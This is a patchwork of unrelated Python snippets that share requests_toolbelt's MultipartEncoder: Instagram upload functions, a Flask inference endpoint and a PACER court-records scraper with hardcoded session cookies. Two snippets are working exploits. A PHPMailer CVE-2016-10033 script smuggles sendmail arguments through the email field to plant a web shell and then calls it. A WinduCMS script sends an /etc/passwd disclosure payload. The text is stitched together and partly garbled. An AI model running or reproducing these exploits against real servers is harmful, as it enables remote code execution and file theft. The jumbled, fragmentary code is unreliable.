def upload_video( self, path_to_video: str, path_to_thumbnail: str, caption: Optional[str] = None, upload_id: Optional[str] = None, is_sidecar: Optional[bool] = None ) -> None: """ Upload video to Instagram Args: path_to_video: str Path to video file path_to_thumbnail: str Path to thumbnail image file caption: str Post caption upload_id: is_sidecar: bool Is part of carousel/a post with multiple videos or photos """ if upload_id is None: upload_id = str(int(time.time() * 1000)) data = { 'upload_id': upload_id, '_csrftoken': self.token, 'media_type': '2', '_uuid': self.uuid } if is_sidecar: data['is_sidecar'] = '1' m = MultipartEncoder(data, boundary=self.uuid) self.session.headers.update({ 'X-IG-Capabilities': '3Q4=', 'X-IG-Connection-Type': 'WIFI', 'Host': 'i.instagram.com', 'Cookie2': '$Version=1', 'Accept-Language': 'en-US', 'Accept-Encoding': 'gzip, deflate', 'Content-type': m.content_type, 'Connection': 'keep-alive', 'User-Agent': self.USER_AGENT }) response = self.session.post(f"{self.API_URL}upload/video/", data=m.to_string()) if response.status_code == 200: body = json.loads(response.text) upload_url = body['video_upload_urls'][3]['url'] upload_job = body['video_upload_urls'][3]['job'] video_data = open(path_to_video, 'rb').read() # solve issue #85 TypeError: slice indices must be integers or None or have an __index__ method request_size = int(math.floor(len(video_data) / 4)) last_request_extra = (len(video_data) - (request_size * 3)) headers = copy.deepcopy(self.session.headers) self.session.headers.update({ 'X-IG-Capabilities': '3Q4=', 'X-IG-Connection-Type': 'WIFI', 'Cookie2': '$Version=1', 'Accept-Language': 'en-US', 'Accept-Encoding': 'gzip, deflate', 'Content-type': 'application/octet-stream', 'Session-ID': upload_id, 'Connection': 'keep-alive', 'Content-Disposition': 'attachment; filename="video.mov"', 'job': upload_job, 'Host': 'upload.instagram.com', 'User-Agent': self.USER_AGENT }) for i in range(0, 4): start = i * request_size if i == 3: end = i * request_size + last_request_extra else: end = (i + 1) * request_size length = last_request_extra if i == 3 else request_size content_range = f"bytes {start}-{end - 1}/{len(video_data)}" self.session.headers.update({ 'Content-Length': str(end - start), 'Content-Range': content_range }) response = self.session.post(upload_url, data=video_data[start:start + length]) self.session.headers = headers if response.status_code == 200: if self.configure_video(upload_id, path_to_video, path_to_thumbnail, caption): self.expose()
def _do_inference(self, model_fn): """HTTP endpoint provided by the gateway. This function should be partially applied with the model_fn argument before it is added as a Flask route. Flask functions do not need to take any arguments. They receive the request data via the module variable flask.request, which is... somehow always supposed to be accurate within the context of a request-handler. :param callable model_fn: the callback function to use for inference. """ r = flask.request try: encoding = r.mimetype_params['charset'] except KeyError: encoding = 'utf-8' if not r.content_type.startswith('multipart/related'): msg = 'invalid content-type {}'.format(r.content_type) logger.error(msg) return make_response(msg, 400) # Decode JSON and DICOMs into BytesIO buffers and pass to model mp = MultipartDecoder( content=r.get_data(), content_type=r.content_type, encoding=encoding ) input_hash = hashlib.sha256() for part in mp.parts: input_hash.update(part.content) input_digest = input_hash.hexdigest() logger.debug('received request with hash %s' % input_digest) test_logger = tagged_logger.TaggedLogger(logger) test_logger.add_tags({ 'input_hash': input_digest }) request_json_body = json.loads(mp.parts[0].text) request_binary_dicom_parts = [BytesIO(p.content) for p in mp.parts[1:]] response_json_body, response_binary_elements = model_fn( request_json_body, request_binary_dicom_parts, input_digest ) output_hash = hashlib.sha256() output_hash.update(json.dumps(response_json_body).encode('utf-8')) for part in response_binary_elements: output_hash.update(part) output_digest = output_hash.hexdigest() test_logger.add_tags({ 'output_hash': output_digest }) test_logger.debug('request processed') logger.debug('sending response with hash %s' % output_digest) # Serialize model response to text response_body_text_elements = self._serializer( response_json_body, response_binary_elements ) # Assemble the list of multipart/related parts # The json response must be the first part fields = [] fields.append( self._make_field_tuple( 'json-body', json.dumps(response_json_body), content_type='application/json' ) ) fields.extend( self._make_field_tuple('elem_{}'.format(i), elem, mimetype) for i, (mimetype, elem) in enumerate(response_body_text_elements) ) fields.append( self._make_field_tuple( 'hashes', input_digest + ':' + output_digest, content_type='text/plain' ) ) # Encode using the same boundary and encoding as original encoder = MultipartEncoder( fields, encoding=mp.encoding, boundary=mp.boundary ) # Override the Content-Type header that MultipartEncoder uses # flask.make_response takes content, response code, and headers return make_response( encoder.to_string(), 200, {'Content-Type': 'multipart/related; boundary={}'.format(mp.boundary)} )
# in order to not work out of the box fields = { 'action': 'submit', 'name': payload, 'email': '"a\\\" -OQueueDirectory=%s -X%s/%s \"@protonmail.com' % (queue_dir_path, www_path, backdoor_file), 'message': 'Pwned' } m = MultipartEncoder(fields=fields, boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe') headers = {'User-Agent': 'curl/7.47.0', 'Content-Type': m.content_type} # If set runs HTTP requests through Burp proxies = {'http': 'localhost:8080', 'https': 'localhost:8080'} # proxies = None log.info("Sending SHELL to target") r = requests.post(target, data=m.to_string(), headers=headers, proxies=proxies) log.info("Finish") if r.status_code == 200: log.info("Exploited %s" % target)
print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║ ██║ ██║██║ ██║██╔══╝ ██╔══██╗") print("██║ ██║██║ ╚████║██║ ██║██║ ██║╚██████╗╚██████╔╝██████╔╝███████╗██║ ██║") print("╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝") print(" PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com") print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n") target = 'http://*****:*****@protonmail.com', 'message': 'Pwned'} m = MultipartEncoder(fields=fields, boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe') headers={'User-Agent': 'curl/7.47.0', 'Content-Type': m.content_type} proxies = {'http': 'localhost:8081', 'https':'localhost:8081'} print('[+] SeNdiNG eVIl SHeLL To TaRGeT....') r = requests.post(target, data=m.to_string(), headers=headers) print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D') r = requests.get(target+backdoor, headers=headers) if r.status_code == 200: print('[+] ExPLoITeD ' + target)
def parse6(self, response): #with open("pacer_html4444.html",'w') as f1: # f1.write(response.body) form_data = { 'all_case_ids': '0', 'case_num': '', 'last_name': '', 'first_name': '', 'middle_name': '', 'office': '', 'nsuit': '', 'case_type': '', 'cause': '', 'case_flags': '', 'filed_from': '9/12/2018', 'filed_to': '10/12/2018', 'ShowFull': '1', 'Key1': 'cs_sort_case_numb', 'UserType': '' } me = MultipartEncoder(fields=form_data) me_boundary = me.boundary[2:] #need this in headers me_length = me.len #need this in headers me_body = me.to_string() header = { 'Connection': 'keep-alive', 'Cache-Control': 'max-age=0', 'Origin': 'https://ecf.almd.uscourts.gov', 'Upgrade-Insecure-Requests': '1', 'Content-Type': 'multipart/form-data; charset=utf-8; boundary=' + me_boundary, 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'Referer': 'https://ecf.almd.uscourts.gov/', 'Accept-Encoding': 'gzip, deflate, br', 'Accept-Language': 'en-US,en;q=0.9' } #bodydata='------WebKitFormBoundarylLLtL7XgUBaPnHEp\r\nContent-Disposition: form-data; name="all_case_ids"\r\n\r\n0\r\n------WebKitFormBoundarylLLtL7XgUBaPnHEp\r\nContent-Disposition: form-data; name="case_num"\r\n\r\n\r\n------WebKitFormBoundarylLLtL7XgUBaPnHEp\r\nContent-Disposition: form-data; name="last_name"\r\n\r\n\r\n------WebKitFormBoundarylLLtL7XgUBaPnHEp\r\nContent-Disposition: form-data; name="first_name"\r\n\r\n\r\n------WebKitFormBoundarylLLtL7XgUBaPnHEp\r\nContent-Disposition: form-data; name="middle_name"\r\n\r\n\r\n------WebKitFormBoundarylLLtL7XgUBaPnHEp\r\nContent-Disposition: form-data; name="office"\r\n\r\n\r\n------WebKitFormBoundarylLLtL7XgUBaPnHEp\r\nContent-Disposition: form-data; name="nsuit"\r\n\r\n\r\n------WebKitFormBoundarylLLtL7XgUBaPnHEp\r\nContent-Disposition: form-data; name="case_type"\r\n\r\n\r\n------WebKitFormBoundarylLLtL7XgUBaPnHEp\r\nContent-Disposition: form-data; name="cause"\r\n\r\n\r\n------WebKitFormBoundarylLLtL7XgUBaPnHEp\r\nContent-Disposition: form-data; name="case_flags"\r\n\r\n\r\n------WebKitFormBoundarylLLtL7XgUBaPnHEp\r\nContent-Disposition: form-data; name="filed_from"\r\n\r\n9/1/2018\r\n------WebKitFormBoundarylLLtL7XgUBaPnHEp\r\nContent-Disposition: form-data; name="filed_to"\r\n\r\n9/21/2018\r\n------WebKitFormBoundarylLLtL7XgUBaPnHEp\r\nContent-Disposition: form-data; name="ShowFull"\r\n\r\n1\r\n------WebKitFormBoundarylLLtL7XgUBaPnHEp\r\nContent-Disposition: form-data; name="Key1"\r\n\r\ncs_sort_case_numb\r\n------WebKitFormBoundarylLLtL7XgUBaPnHEp\r\nContent-Disposition: form-data; name="UserType"\r\n\r\n\r\n------WebKitFormBoundarylLLtL7XgUBaPnHEp--\r\n' urlcode = response.xpath( '//*[@id="cmecfMainContent"]/form/@action').extract()[0] #print urlcode link = response.meta['base_url'].rstrip('/') + urlcode.replace( '..', '') #print link #req=scrapy.FormRequest(link, meta = {'dont_redirect': True,'handle_httpstatus_list': [500,302]}, body=bodydata, headers={'Connection': 'keep-alive' , 'Cache-Control': 'max-age=0' , 'Origin': 'https://pacer.login.uscourts.gov' , 'Upgrade-Insecure-Requests': '1' , 'Content-Type': 'application/x-www-form-urlencoded' , 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36' , 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' , 'Referer': 'https://pacer.login.uscourts.gov/csologin/login.jsf' , 'Accept-Encoding': 'gzip, deflate, br' , 'Accept-Language': 'en-US,en;q=0.9' }, callback=self.parse7, method="POST") req = scrapy.Request(link, meta={ 'dont_redirect': True, 'handle_httpstatus_list': [500, 302] }, body=me_body, headers=header, callback=self.parse7, method="POST") req.cookies = { '_ga': 'GA1.2.1437274789.1534401822', 'ClientValidation': "", 'ClientCodeDescription': "", 'MENU': 'slow', 'PacerSession': '0oxdQUxn4oxv1KlUJAvfr4kkFQEROH2k0tiDHGNeUEdE2oO5N3NeEJmy5AsVBQiPvefaUJSXI9DSOfshoFpoY94Bgv4EJaiC2mt7Zv2ecmzRpIT4nBqY2COBdjf3YQ0Q', 'NextGenCSO': '0oxdQUxn4oxv1KlUJAvfr4kkFQEROH2k0tiDHGNeUEdE2oO5N3NeEJmy5AsVBQiPvefaUJSXI9DSOfshoFpoY94Bgv4EJaiC2mt7Zv2ecmzRpIT4nBqY2COBdjf3YQ0Q', 'PacerClientCode': 'Lumina', 'PacerClient': "", 'ClientDesc': "", 'PacerPref': "receipt=Y" } req.meta['base_url'] = response.meta['base_url'] req.meta['initial_url'] = response.meta['initial_url'] #req.meta['base_court_name']=response.meta['base_court_name'] yield req
def upload_photo(self, photo, caption=None, upload_id=None, from_video=False, force_resize=False, options={}): """Upload photo to Instagram @param photo Path to photo file (String) @param caption Media description (String) @param upload_id Unique upload_id (String). When None, then generate automatically @param from_video A flag that signals whether the photo is loaded from the video or by itself (Boolean, DEPRECATED: not used) @param force_resize Force photo resize (Boolean) @param options Object with difference options, e.g. configure_timeout, rename (Dict) Designed to reduce the number of function arguments! This is the simplest request object. @return Boolean """ options = dict({ 'configure_timeout': 15, 'rename': True }, **(options or {})) if upload_id is None: upload_id = str(int(time.time() * 1000)) if not photo: return False if not compatible_aspect_ratio(get_image_size(photo)): self.logger.error( 'Photo does not have a compatible photo aspect ratio.') if force_resize: photo = resize_image(photo) else: return False with open(photo, 'rb') as f: photo_bytes = f.read() data = { 'upload_id': upload_id, '_uuid': self.uuid, '_csrftoken': self.token, 'image_compression': '{"lib_name":"jt","lib_version":"1.3.0","quality":"87"}', 'photo': ('pending_media_%s.jpg' % upload_id, photo_bytes, 'application/octet-stream', { 'Content-Transfer-Encoding': 'binary' }) } m = MultipartEncoder(data, boundary=self.uuid) self.session.headers.update({ 'X-IG-Capabilities': '3Q4=', 'X-IG-Connection-Type': 'WIFI', 'Cookie2': '$Version=1', 'Accept-Language': 'en-US', 'Accept-Encoding': 'gzip, deflate', 'Content-type': m.content_type, 'Connection': 'close', 'User-Agent': self.user_agent }) response = self.session.post(config.API_URL + "upload/photo/", data=m.to_string()) configure_timeout = options.get('configure_timeout') if response.status_code == 200: for attempt in range(4): if configure_timeout: time.sleep(configure_timeout) if self.configure_photo(upload_id, photo, caption): media = self.last_json.get('media') self.expose() if options.get('rename'): from os import rename rename(photo, "{}.REMOVE_ME".format(photo)) return media return False
def uploadVideo(self, video, thumbnail, caption=None, upload_id=None): if upload_id is None: upload_id = str(int(time.time() * 1000)) data = { 'upload_id': upload_id, '_csrftoken': self.token, 'media_type': '2', '_uuid': self.uuid, } m = MultipartEncoder(data, boundary=self.uuid) self.s.headers.update({ 'X-IG-Capabilities': '3Q4=', 'X-IG-Connection-Type': 'WIFI', 'Host': 'i.instagram.com', 'Cookie2': '$Version=1', 'Accept-Language': 'en-US', 'Accept-Encoding': 'gzip, deflate', 'Content-type': m.content_type, 'Connection': 'keep-alive', 'User-Agent': self.USER_AGENT }) response = self.s.post(self.API_URL + "upload/video/", data=m.to_string()) if response.status_code == 200: body = json.loads(response.text) upload_url = body['video_upload_urls'][3]['url'] upload_job = body['video_upload_urls'][3]['job'] videoData = open(video, 'rb').read() request_size = math.floor(len(videoData) / 4) lastRequestExtra = (len(videoData) - (request_size * 3)) headers = copy.deepcopy(self.s.headers) self.s.headers.update({ 'X-IG-Capabilities': '3Q4=', 'X-IG-Connection-Type': 'WIFI', 'Cookie2': '$Version=1', 'Accept-Language': 'en-US', 'Accept-Encoding': 'gzip, deflate', 'Content-type': 'application/octet-stream', 'Session-ID': upload_id, 'Connection': 'keep-alive', 'Content-Disposition': 'attachment; filename="video.mov"', 'job': upload_job, 'Host': 'upload.instagram.com', 'User-Agent': self.USER_AGENT }) for i in range(0, 4): start = i * request_size if i == 3: end = i * request_size + lastRequestExtra else: end = (i + 1) * request_size length = lastRequestExtra if i == 3 else request_size content_range = "bytes {start}-{end}/{lenVideo}".format( start=start, end=(end - 1), lenVideo=len(videoData)).encode('utf-8') self.s.headers.update({ 'Content-Length': str(end - start), 'Content-Range': content_range, }) response = self.s.post(upload_url, data=videoData[start:start + length]) self.s.headers = headers if response.status_code == 200: if self.configureVideo(upload_id, video, thumbnail, caption): self.expose() return False
# Vendor Homepage: http://windu.org # Version: 3.1 # Tested on: Linux Debian 9 # # // Description // # # Local File Disclosure vulnerability exists in WinduCMS through a vulnerable PHPMailer version 5.2.1 used here # # // PoC // # # It requires a contact form present on the website # # Example: {{W name=contactForm inputs="name" email="root@localhost"}} # from requests_toolbelt import MultipartEncoder import requests print("WinduCMS <= 3.1 Exploit") url = 'http://localhost/contact_page?mn=contactform.message.negative' email = '*****@*****.**' payload = '<img src="/etc/passwd"' form_input = 'name' fields = {'form_key': 'contactForm', form_input: 'Attacker', 'email': email, 'content': payload} m = MultipartEncoder(fields=fields, boundary='----WebKitFormBoundary1500777958139315') headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 'Content-Type': m.content_type} print('Sending payload to target...') r = requests.post(url, data=m.to_string(), headers=headers) if r.status_code == 200: print('Exploited.')